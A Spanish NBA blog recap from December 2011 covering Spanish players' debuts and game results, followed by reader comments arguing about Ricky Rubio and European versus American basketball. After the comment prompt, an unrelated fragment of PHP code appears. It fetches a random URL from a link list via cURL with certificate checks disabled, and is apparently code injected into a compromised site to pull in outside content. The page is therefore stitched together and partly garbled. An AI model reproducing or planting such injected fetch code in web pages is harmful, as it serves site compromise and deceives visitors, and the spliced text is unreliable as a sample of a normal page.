La Crónica (26/12/2011)

27 de December de 2011 por TheDeerHunter

Exceso de partidos y repaso relámpago. Hoy terminaban de debutar todos los españoles, con diferentes suertes.

Buena actuación y victoria de Jose Calderon, siendo el mejor de sus Raptors (104-96). Hasta 7 compañeros en dobles figuras con altísimos porcentajes gracias en buena parte a su dirección y asistencias, estropeando el estreno del favorito para el RoY Kyrie Irving. Mejor estuvo Tristan Thompson.

Victoria también de Rudy en una demostración de músculo de los Nuggets ante Dallas. Errático partido del mayorquín que contó con minutos, pero espectacular de sus bases Ty Lawson y André Miller. El equipo de George Karl volvió a dejar en evidencia a los vigentes campeones, que definitivamente no están en forma y terminaron maquillando otra buena paliza (115-93).

En el Thunder@Wolves hubo derbi nacional. Cobertura intensa de los medios americanos al debut de Ricky, que cumplió sobradamente al interés, levantando al público de sus asientos toda la velada y quedándose con la manija en la resolución de un partido más igualado de lo que se esperaba (104-100). Buen debut de Derrick Williams también, aunque Durant y Westbrook terminaran superándoles. Ibaka estuvo más discreto. Por cierto, no sabría calificar los 27 tiros de Beasley.

Derrota para ambos Gasoles, como buenos hermanos. Marc debutó dignamente en San Antonio, aunque los errores propios de su equipo facilitara una victoria demasiado cómoda para los locales (82-95). La intensa defensa del perímetro que les llevó a pasar por encima de los Spurs durante la postemporada no se ha visto por ningún lado. Los Lakers, por su parte, ahondaron en su inicial crisis siendo ajusticiados, como los Grizzlies, desde la línea de 3 (91-100). Thornton, Tyreke y Salmons se pusieron las botas. Kobe y Pau a lo suyo, con la noticiosa ayuda de M.W.Peace. El resto estuvo bastante mediocres.

En otros choques de interés, excelente debut de Portland ante Philadelphia con LaMarcus destacado (103-107). Derrota de los Bulls en Oakland, con Curry sacándose la espina del día anterior (91-99). También se la sacaron Howard, Richardson, Reddick y Turkoglu a costa de Houston (95-104). Los Hornets ganaron en el último instante a los Suns a domicilio con la interesante dupla Eric Gordon-Belinelli (85-84). Charlotte también doblegó a Milwaukee por los pelos (95-96) y los Nets doblegaron con ciertas dificultades a Washington Wizards (90-84).

Finalmente los Pacers no tuvieron grandes problemas en cargarse a Detroit (79-91). Intensa y emocionante segunda jornada.

PREMIOS

MVP: Deron Williams y Boris Diaw se quedaron muy cerca de conseguir el primer triple doble de la temporada pero es que a Stephen Curry solo le faltaron 3 rebotes y 4 robos para conseguir ¡un cuádruple doble! Sus 21 puntos, 7 rebotes, 10 asistencias y 6 robos impresionan.

Rookie: Kemba Walker empieza la temporada con 13 puntos, 7 rebotes y 3 asistencias, Tristan Thompson con 12 puntos y 5 rebotes en 17 minutos, la pareja de los Wolves Rubio-Williams con 6-5-6 para el primero y 13-6 para el segundo en unos 25 minutos para ambos. En cambio, Kyrie Irving y Jimmer Fredette decepcionaron.


Sorpresa: Gerald Henderson
puede ser una de las sorpresas de la temporada. Anoche ya se fue a los 18 puntos y 9 rebotes. Por su parte, Hedo Turkoglu fue el mejor de los Magic con 23 puntos y Robin Lopez de los Suns con 21 puntos y 7 rebotes. Increíble, ¿no? Pues no tanto como observar a Metta World Peace anotar 19 puntos y repartir 4 asistencias.

Decepción: Gran partido de debut de Stephen Jackson con su nuevo equipo. 6 y 3 pérdidas en 17 minutos, los que necesitó para ser expulsado. Michael Beasley se cascó un 11 de 27. ¿Siente ya el aliento de Derrick Williams en el cogote?

Esfuerzo en vano: Spencer Hawes y Kyle Lowry presentaron unas hojas estadísticas completísimas, cercanas al triple doble, pero no fueron suficiente para llevarse sus respectivos partidos.

Imágenes | AP Photos / Getty Images

Comenta

58 comentarios a esta entrada

  1. Nacho dice:
    #1

    Melo, ¡ay! Melo. Si no sabes torear…
    Que te mole la NCAA vale.
    Que consideres que el basket FIBA es una m…., allá tú.
    Pero cuando hables de deteminadas cosas, ¡infórmate!
    Nadie te ha dicho nada del físico, lo que te han dicho es que las reglas NBApremian el físico, y que las reglas FIBA son diferentes. Te pongo el ejemplo de tu admirado Stat. Tiene un físico privilegiado, pero jugando en Europa metería una décima parte de los puntos que mete allí. ¿Por qué? (aparte de porque es malillo, jeje), pues porque en Europa no permiten los pasos de salida, ni los tres pasos al entrar a canasta (cosa que en la NBA teóricamente no permiten, pero que dejan pasar a algunos -LeBron, Stat-) No he seguido mucho a tu admirado en NY, pero en Arizona en casi todos los pick con Nash aquí habrían sido ilegales. A eso se refiere nach en cuanto a la diferencia de físico (y a algunas cosas más)
    No todo el basket es NBA, aunque a algunos nos mole mogollón. Diamantidis no fue porque no quiso, y punto. Mírate partidos de este bicho, o al Papaloukas del CSKA. Y si quieres flipar pincha en un tal Bodiroga, y luego hablamos.
    Un abrazo, y feliz año.

      Citar

  2. nach dice:
    #2

    melo15:
    En que sentido

    Quitando el tema de la intensidad, que es de LOL total, vamos a ver los números, ya que te gustan tanto:

    Ricky, 21 años:
    – 2 Eurobaskets (2009,2011)
    – 1 Euroliga (2010)
    – 1 EuroCup (2006)
    – 1 ULEB (2008)
    – 3 Copas del Rey (2008, 2010, 2011)
    – 1 Liga española (2011)
    – Plata olímpica (2008)

    Si quieres ir a números, vamos a números, estás hablando de un jugador CONTRASTADO con 21 años. Puede que no meta tantos puntos como otros? ni que rebotée tanto? de acuerdo, pero a día de hoy es un jugador que con 21 años ha ganado TODO lo que se puede ganar en Europa, mientras sus compañeros de promoción que han ganado? una NCAA? 2? Alguna experiencia aparte de eso? años en el instituto? por favor…

      Citar

  3. melo15 dice:
    #3

    Nach jennings, curry y todos estos no han ganado nada ha esta edad porque ni michael jordan habia ganado nada ha esa edad, como quieres que ganen unos juegos olimpicos si no pueden ir al equipo de USA porque hay mejores bases. Diamantidis no quiso ir en la NBA porque sabia que alli seria un jugador normalillo en cambio en Europa es un dios.
    Vale RIcky ha ganado muchas cosas, pero es ahora que ha de demostrar que puede ser un pedazo de jugador, es ahora cuando va a medirse con los mejores bases, y es ahora cuando va ha tener que ser capaz de anotar porque esto es la NBA no la FIBA y en la NBA se juga con las reglas de la NBA.
    Sobre Stat si va a europa le metera un repaso ha todos los pivots de allo sin logar a dudas porque tiene un muy buen tiro de media distancia.
    Jennings no ha ganado nada un, pero ayer le metio un repaso a ricky demostrando que es mejor que el endosandole 24 a los wolves, se han enfrentado cara a cara porfavor,

      Citar

  4. GreenPride dice:
    #4

    Bueno veo que la discusión Ricky está en su cúlmen. Yo creo que no hay que ser tan precipitados y darle al menos media temporada antes de valorar.
    Su primer partido fue bastante bueno, con grandes pases y buen control del juego. En el segundo no ha estado tan bien y Jennings le ha ganado claramente la partida. Démosle tiempo para demostrar si es jugador para estar en la NBA (que yo creo que si) o para hacer algo más y ser una estrella (que yo creo que no). Sobre Ricky contra Kemba, Irving y demás rookies está claro que tienen un historial mucho peor pero es que en USA con 15 años no puedes ser profesional, es más no se puede hasta los 19 así que por decirlo de algun modo sólo habría que contar 2 años de Ricky para compararlo con los demás, dicho lo cual estoy de acuerdo en que Ricky lee el juego bastante mejor que los otros. Veremos cómo va la temporada, aunque al menos nos van a dejar enjuiciarlo bien ya que parece que va a tener más de 25 minutos por partido para demostrar si vale o no.

      Citar

  5. nach dice:
    #5

    melo15:
    Nach jennings, curry y todos estos no han ganado nada ha esta edad porque ni michael jordan habia ganado nada ha esa edad, como quieres que ganen unos juegos olimpicos si no pueden ir al equipo de USA porque hay mejores bases. Diamantidis no quiso ir en la NBA porque sabia que alli seria un jugador normalillo en cambio en Europa es un dios.
    Vale RIcky ha ganado muchas cosas, pero es ahora que ha de demostrar que puede ser un pedazo de jugador, es ahora cuando va a medirse con los mejores bases, y es ahora cuando va ha tener que ser capaz de anotar porque esto es la NBA no la FIBA y en la NBA se juga con las reglas de la NBA.
    Sobre Stat si va a europa le metera un repaso ha todos los pivots de allo sin logar a dudas porque tiene un muy buen tiro de media distancia.
    Jennings no ha ganado nada un, pero ayer le metio un repaso a ricky demostrando que es mejor que el endosandole 24 a los wolves, se han enfrentado cara a cara porfavor,

    Exacto, ninguno ha ganado nada a esa edad, Ricky si, por lo tanto se merecerá un respeto y una consideración que parece que no le tienes, y a mí me parece un jugador limitadísimo por el tema del tiro, pero que es capaz de aportar otras cosas al nivel de los mejores, en especial a nivel de dirección, donde destaca muchísimo y donde me atrevo a decir que es el mejor de los bases entrantes este año en la NBA.

    Respecto a Jennings, pues sí, es un anotador con un 38% de acierto en su carrera, y que curiosamente ha jugado en Europa con unas estadísticas demoledoras xD.

    Diamantidis, al igual que Papaloukas o que Bodiroga, no quiso ir a la NBA porque sabían que no se les iba a valorar lo que realmente valen, como se ha hecho otras tantas veces con europeos, y entre ser el mejor jugador de Europa o ir a la NBA a arrastrarte jugando 10 minutos por partido sin moverte de la esquina porque se creen que no sabes hacer nada más y no te dejan demostrarlo, muchos eligen lo primero, y con razón.

    Con respecto a lo de Stat pues no te digo yo que no fuera a ser el mejor 5 de Europa, pero tendría que cambiar su forma de jugar, no es lo mismo FIBA que NBA, y muchos de los jugadores americanos no tienen normalmente los fundamentos para romper una zona más allá de intentar triples desde el sofá de su casa.

      Citar

  6. Sancho88 dice:
    #6

    nach: A nivel de reglamentación, también los Europeos se ven muy perjudicados por el tema de los pasos de salida, que aumentan la diferencia con los jugadores americanos, mucho más atléticos, al igual que por los temas de la defensa zonal y basar la defensa completamente casi en individual. Hace unos años Grecia se cepilló a USA a base de defensa en zona que los americanos no sabían como atacar más allá de tirar triples desde su casa, y eso llevando a algunas estrellas. En los JJOO ganaron el oro, no voy a decir inmerecidamente, pero si de forma bastante discutible en cuanto a la aplicación de normas FIBA. Con normas FIBA la diferencia entre europeos y americanos no es tan grande, porque el componente físico se puede contrarrestar con entendimiento del juego, inteligencia y posicionamiento, ahora, con reglas NBA es otro cuento muy distinto.

    AMÉN

      Citar

  7. nach dice:
    #7

    Es que es un canteo, en cuanto un equipo se pone en pseudozona de las que están permitidas allí, el otro no sabe como meterle mano salvo por alguna genialidad de sus jugadores, que son muy buenos. Yo no vi el partido, pero la contrastación de esto por lo que se comenta se vio ayer en el Miami-Boston.

    A los jugadores americanos les suelen faltar ciertos conceptos a la hora de mover el balón, en especial a los jugadores interiores, siempre hay excepciones de grandísimos pasadores interiores como era Shaq, pero por ejemplo Howard es limitadísimo en este aspecto, y es normal, están acostumbrados a jugarse 1 vs 1 continuamente al poste bajo y eso te genera ciertas deficiencias como la del pase…

    Y esta tendencia se está viendo acentuada en los últimos años con los jugadores que están entrando: casi todos los bases son en realidad combos base-escolta, y el que no lo es, es un anotador, no un director, dan cierto número de asistencias, pero no controlan los tiempos del partido, cada vez hay más hombres interiores versátiles que tienen tiro de 4-5 metros, lo que hace que se vean más pick&roll, hay demasiada especialización en los jugadores….pero la más grave es la de los bases, los mejores bases actuales son o bien base-escolta (Rose, Deron) o anotadores (Paul,Westbrook), por eso Ricky es un soplo de aire fresco, los únicos directores que quedan en la NBA podemos decir que son Kidd y puede que Nash, y el 2º mira bastante al aro también, y ya tienen sus años. Los bases directores son una especie en peligro y a día de hoy Ricky es el último de ellos.

      Citar

  8. Sancho88 dice:
    #8

    Mira, melo, en serio que no te lo estaba diciendo a malas, en serio. Creo que lo que nos une a los foreros que estamos aquí es un amor sincero al baloncesto, y hay un nivel de comentarios que a mí me hacen emocionarme, incluso algunos tuyos. Me parece increíble lo que controlas de NCAA, de veras, y según has contado o vives en Estados Unidos o has vivido, y eso te da a tu tierna edad bastante crédito para hablar del baloncesto de allí. Ahora bien, nadie está comparando el baloncesto universitario de los años 80 con el de ahora, que me parece que tenía un prestigio como mil veces mayor al que tiene ahora. Y lo que yo te comentaba sobre los jugadores europeos, es que creo que casi todos los equipos que quieran aspirar al anillo deben contar con uno o dos. ¿Por qué motivo? Porque les enseñan a entender el baloncesto en todas sus facetas, no les hacen desde los 10 años convertirse en máquinas físicas capaces de machacar con 13 años y demás. Aquí va de otra manera. Y el señor Ricky Rubio, ya que dices que no ha hecho nada nunca, aparte de los títulos que ha presentado nach, te diré que ostenta una de las marcas más impresionantes de la historia del baloncesto de formación.

    Cito a mi colega Igor Minteguía, de solobasket.

    “Los buenos aficionados al basket recordarán aquella asombrosa actuación de Ricky Rubio en la final del Campeonato de Europa Cadete celebrado en Linares en 2006. En aquel partido el base de Regal FC Barcelona logró la friolera de 51 puntos, 24 rebotes, 12 asistencias y 7 robos. Antológico. Lo que tal vez pocos sepan es que en las semifinales de aquella misma competición el mágico jugador catalán lograría un cuádruple-doble en toda regla, sumando 19 puntos, 10 rebotes, 13 asistencias y 11 robos. Lo de Ricky en aquel torneo pasará a la historia de las más memorables actuaciones individuales en el basket FIBA”.

    Si buscas en youtube, “El milagro de Ricky Rubio”, verás a lo que me refiero.

    Y sobre las cosas tan raras que amamos nosotros del baloncesto europeo. Si tienes 30 minutitos, te recomiendo encarecidamente que veas este Informe Robinson de hace algunos años. “De Martín a Gasol” se titula. Dejo el vídeo chicos, porque considero que es de obligado visionado, xd. Aquí no solo vas a ver lo que están diciendo nach, greenpride, etc., sobre lo jodido -con perdón- que ha sido para los europeos llegar a la NBA, sino que espero que abras tu joven mente a lo que significa el baloncesto europeo. Y si te mola este documental, te dejo otros jugadores que seguramente te gustaría haber visto jugar: Drazen Petrovoic, Dejan Bodiroga, Sasha Djordjevic, Carlton Myers, Dejan Tomasevic y Velimir Perasovic. No tengo nada en contra de la cultura física de los estados unidos, al contrario, me parece que ha sido siempre el espejo en el que nos hemos mirados, lo que siempre se ha dicho en europa, que mientras no crezcamos en centímetros y en músculo jamás podremos competir contra aquellos colosos.

    Y ya para terminar, me gustaría saber si tu viste la final de los juegos olímpicos, que estamos citando aquí. Te la recomiendo también encarecidamente, porque fue la mayor actuación de la historia de un equipo fiba contra toda la potencia de los estados unidos. Quitando la machada de grecia, y croacia en Barcelona 92, creo que fue el mejor juego FIBA que jamás se haya visto, el que hizo España, y que al día siguiente tumbó a todas las cabeceras y periódicos del mundo a nuestros pies.

    Nada mas, Melo, la experiencia y el amor por el basket es algo que va creciendo año tras año, y espero que ese amor no lo pierdas, pero que sí ganes mucha experiencia y sabiduría en este deporte, y eso se hace teniendo los ojos bien abiertos, los oídos bien despiertos y leyendo mucho a los que saben.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>